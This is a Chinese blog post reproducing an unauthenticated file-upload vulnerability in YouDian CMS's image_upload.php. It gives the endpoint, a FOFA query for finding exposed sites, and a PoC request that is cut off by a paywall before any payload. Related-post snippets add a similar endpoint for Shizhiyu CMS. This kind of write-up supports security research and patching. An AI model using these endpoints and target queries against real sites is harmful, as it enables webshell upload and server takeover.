友点CMS image_upload.php 文件上传漏洞复现

已于 2024-02-20 21:35:01 修改
阅读量699 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: php web安全 安全
于 2024-02-20 21:34:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136198897
版权

0x01 产品简介

友点CMS是一款高效且灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人,都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板,方便用户按需调整。同时,它具备强大的SEO功能,能提升网站在搜索引擎中的排名。友点CMS还支持多语言设置,适应国际化需求。总的来说,友点CMS是网站建设的理想选择,既高效又易用。

0x02 漏洞概述

友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:app="友点建站-CMS"

0x04 漏洞复现

PoC

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H
Accept-Encoding: gzip
Connection: close

------WebKitFormBoundarydAPjrmyKewWuf
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
漏洞】狮子鱼CMS文件漏洞(image_upload.php)
晚风不及你
02-11 1579
狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
YouDianCMS 友点系统 CKEditor 任意文件
qq_36334672的博客
03-04 1318
友点CMS存在任意文件漏洞,攻击者通过漏洞可以上恶意文件,获取服务器权限。
友点建站系统image_upload.php存在文件漏洞
qq_36334672的博客
04-03 354
友点CMS建站系统image_upload.php 接口处存在文件漏洞,未经身份认证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
漏洞友点CMS image_upload.php 任意文件漏洞
凝聚力安全团队
07-15 148
友点CMS image_upload.php 文件 存在任意文件漏洞,攻击者可以上任意文件,获取 WebShell,控制服务器权限,执行任意命令等。友点企业网站管理系统》(YouDianCMS系统)集电脑网站、手机网站、微信、APP、小程序于一体,共用空间,数据自动同步,是五合一企业建站专业解决方案。
狮子鱼CMS image_upload.php 任意文件
孤桜懶契
03-29 4404
漏洞描述 网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中两个文件漏洞漏洞以及漏洞工具分享。 漏洞影响 s ✅狮子鱼CMS 空间测绘 d ⭕FOFA:"/seller.php?s=/Public/login" 漏洞 POC POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 Host: ip Content-Type
海洋CMS admin_notify.php 远程代码执行漏洞(CVE-2024-30565)
0xSec
06-12 892
海洋CMS admin_notify.php 接口处存在远程代码执行漏洞,经过身份验证的远程攻击者可利用该漏洞执行任意代码,写入后门文件,进而控制整个web服务器。
YouDianCMS友点系统任意文件漏洞
weixin_43567873的博客
03-04 320
YouDianCMS友点系统存在任意文件漏洞
phpcms头像上漏洞引发的故事
qq_68163788的博客
03-15 1604
PHPcms中存在一个头像上漏洞,黑客可以利用这个漏洞恶意文件,比如Webshell,从而获取网站服务器的控制权。黑客通过Webshell开始操控网站服务器,窃取用户的个人信息、数据库信息甚至敏感的财务数据。黑客还可能利用服务器资源进行挖矿、发送垃圾邮件等恶意活动,给网站和用户带来严重的损失。 网站管理员在发异常后赶紧封锁了黑客的访问,但已经造成了不可挽回的损失。为了修漏洞和加强安全措施,网站管理员不得不花费大量时间和精力,重新设计和部署网站系统,修漏洞并加强安全性,以防止类似事件再次发生。
php 任意文件漏洞,一个任意文件漏洞、分析、利用与防御建议...
weixin_29531989的博客
03-24 1601
*本文中涉及到的相关漏洞已报送厂商并得到修,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担前言CMS Made Simple(CMSMS)是一个简单、便捷且易用的内容管理系统。前面一篇文章,我们讲述了关于其中一个基于时间的SQL注入漏洞、分析及利用过程。本文详细讨论CMSMS中的另一个漏洞,也是Web安全中较为常见的一种漏洞类型。ShowTime2是CMSMS中比较常...
tu_加载_tu_tu.php_tu.php文件_苹果_
09-29
这里,我们关注的是一个特定的解决方案,它涉及到一个名为"tu.php"的文件,以及如何利用这个文件来解决苹果CMS系统中图片无法显示的问题。 苹果CMS是一款广泛使用的开源PHP内容管理系统,它允许用户方便地管理和...
PHP_JTBC_CMS.tar.gz_CMS + PHP_JTBC_cms php_php cms
09-23
从提供的压缩包文件内容来看,我们可以深入探讨以下几个关键知识点: 1. **PHP**: PHP是一种广泛使用的服务器端脚本语言,尤其在Web开发领域应用广泛。它允许开发者在服务器端创建动态网页,处理表单数据,与数据库...
yecao.rar_cms_www. yecao_www.yecao_yecao网站_日yecao
09-14
从【压缩包子文件文件名称列表】来看,我们可以解析出以下几个关键知识点: 1. **User.asp**:这是一个用户相关页面,通常包含用户登录、注册、个人信息管理等功能。在ASP(Active Server Pages)环境中,这样的...
fannuo4.1.rar_cms_login.asp
09-22
【标题】"fannuo4.1.rar_cms_login.asp" 涉及的主要知识点是企业网站建设和ASP编程,特别是CMS(内容管理系统)的登录页面实。在这个标题中,"fannuo4.1.rar"可能是一个软件版本号或者项目名称,而"cms_login.asp...
PHP_JTBC_CMS.tar.gz_PHP管理系统
09-14
安装过程中,通常会涉及上文件到服务器、设置数据库连接、运行安装脚本等步骤。在实际操作前,详细阅读`_install.txt`和查看`readme.png`至关重要,它们将指导用户顺利完成系统部署并开始使用。同时,系统可能还...
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
最新发布
12年全栈程序开发
07-17 221
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
小欧吃苹果-OPPO 2024届校招正式批笔试题-数据开发(C卷)
sigd的博客
07-16 500
小欧吃苹果,拓扑排序处理贪心问题。
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1291
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
PHP基础语法
红客网络编程与渗透技术
07-15 263
下面,我们提供了一个简单的 PHP 文件实例,它可以向浏览器输出文本 "Hello World!PHP 中的每个代码行都必须以分号结束。分号是一种分隔符,用于把指令集区分开来。通过 PHP,有两种在浏览器输出文本的基础指令:echo 和 print。PHP 脚本在服务器上执行,然后将纯 HTML 结果发送回浏览器。PHP 文件通常包含 HTML 标签和一些 PHP 脚本代码。PHP 脚本以
if(frame_rx.can_id == 0x31){ geometry_msgs::Twist real_motion; int16_t vel_cms = 0; double vel_ms = 0; int16_t angle_deg_100 = 0; double angle_rad = 0; vel_cms = ((frame_rx.data[1] << 8) & 0xffff) | frame_rx.data[0]; angle_deg_100 = (((frame_rx.data[3] << 8) & 0xffff) | frame_rx.data[2]); vel_ms = (double)vel_cms / param_vc; angle_rad = (double)angle_deg_100 / 100.0 * (M_PI / 180.0); real_motion.linear.x = vel_ms; real_motion.angular.z = angle_rad; motion_pub.publish(real_motion); }
02-20
| frame_rx.data[0]) / 100; vel_ms = vel_cms / 100; angle_deg_100 = ((frame_rx.data[3] << 8) | frame_rx.data[2]) / 100; angle_rad = angle_deg_100 * 0.01;实际运动的速度cms = ((frame_rx.data[1] << 8) | frame_rx.data[0]) / 100,速度ms = vel_cms / 100,角度deg_100 = ((frame_rx.data[3] << 8) | frame_rx.data[2]) / 100,角度rad = angle_deg_100 * 0.01。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值